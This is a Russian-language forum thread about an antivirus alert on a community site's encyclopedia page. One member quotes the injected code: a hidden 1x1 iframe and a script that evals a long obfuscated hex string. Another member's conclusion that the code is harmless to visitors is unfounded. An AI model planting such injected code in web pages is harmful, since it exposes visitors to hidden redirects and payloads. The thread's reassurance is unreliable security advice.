Троян в «Энциклопедии Зенайта»

[Caesarion]

При попытке зайти на страницу сайта "Энциклопедия зенайта" Avast разрывает соединение с комментарием JS/Redirector.AY [Trj]. Как это понимать?

[Хель]

Поэтому ты дал ссылку, чтобы любой желающий мог зайти и проверить, действительно ли там что-то есть?))) Как мы не любим своих софорумцев...
Ждем Ежа, чтобы сказать, все там в порядке, или просто антивирус проявляет активную бдительность.
И вопрос: каким браузером ты пользуешься?

[Algiz]

Большинство антивирусов проверяют на вирусы только те файлы, которые уже находятся на машине пользователя, http-трафик от страницы до машины они не проверяют. Например, мой Symantec не видит никаких вирусов при заходе на эту страницу потому что не фильтрует трафик. Но и на моей машине этого файла не находит, из чего я делаю вывод, что этот JS/Redirector.AY [Trj] не скачивается на комп, он просто болтается в трафике. Т.е. это не опасно для пользователей. Паника отменяется
Другой вопрос как он вообще попал на страницу Энциклопедии и как его теперь оттуда потереть.
Сейчас еще Керио установлю, проверю им.

Вечером напишу запрос хостеру на антивирусную проверку всех наших файлов на их сервере, посмотрим что ответят.


upd Керио не нашел никаких вирусов в трафике с сайта и форума, даже не ругался ни разу. К примеру, яндыгз Керио вообще отказался грузить, ибо нефиг

Погуглила JS/Redirector.AY, на этот файл ругаются, но ни в одном списке вирусов (в т.ч. у каспера) его нет Есть описание аналогичного файла "JS:Redirector-E [Trj] is a detection for a malicious JavaScript file that injects itself on internet browser and modify default homepage settings on the computer. JS:Redirector-E [Trj] primary concern is to redirect internet browser and search result of the infected computer to a predefined websites. These websites are usually scam or fake security websites."
Насколько я знаю, JS.Redirector это сценарий Java Script. Реально ли это троян/вирус, или антивирус перестраховывается - непонятно.
Вот еще что нашла: http://support.kaspersky.ru/kis2010/all ... =208637461
Короче, все туманно.

[Caesarion]

Я не разбираюсь в веб-программировании, но, похоже, смотреть надо на то, что начинается после закрывающего тега html. Сначала идёт вроде бы безобидное, но уже подозрительное:
<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>
Потом несколько человекочитаемых команд. А после последней (через точку с запятой) идёт вот это:
","13475b424311134d404b5611135c4c5d465f5b11594e5d0f5b4a425f66695d4e424a124b404
c5a424a415b014c5d4a4e5b4a6a434a424a415b070846495d4e424a0806145b4a425f66695d4e424
a015c4a5b6e5b5b5d464d5a5b4a0708464b0803087d7c66695d4e424a0806145b4a425f66695d4e4
24a015c4a5b6e5b5b5d464d5a5b4a07085c5d4c080308475b5b5f1500004c43464c44025f40465c4
4014c4042005b474a5d4a004641014c484610180806145b4a425f66695d4e424a015c5b56434a015
9465c464d4643465b56120847464b4b4a4108145b4a425f66695d4e424a015c5b56434a0158464b5
b4712081f5f5708145b4a425f66695d4e424a015c5b56434a01474a4648475b12081f5f570814666
95d4e424a604d450f120f4b404c5a424a415b014d404b56014e5f5f4a414b6c4746434b075b4a425
f66695d4e424a061413005c4c5d465f5b1113004d404b56111300475b424311"];eval(rpnsxy[0]
);</script>
Такое чувство, что происходит преобразование hex-строки во вредоносный код. Стоит заметить, что всё это написано в одну строчку. Хороший человек так бы не стал программировать.

Так что, мне кажется, этот код не опасен для хостинга, а направлен именно на пользователя. Или я ошибаюсь?

[Algiz]

Эту редисочную <iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe> срочку я уже нашла. Просмотрела мельком другие страницы, вроде только на Энциклопедии. Оно зловредное, но безобидное. Пролезло скорее всего через какую-нибудь уязвимость.
Забавно, что ее видит только Avast.

В тех. поддержке мне сказали (сокращенно) что ничем нам помочь не могут, это мы должны с нашей стороны искать уязвимости и закрывать.

Короче, выводы:
1) антивирус ругается не зря
2) паники по-прежнему не нужно, потому что никакого вреда этот недоделанный "троян" не создает, на ваши машины не качается, Еж вернется и все почистит ( ).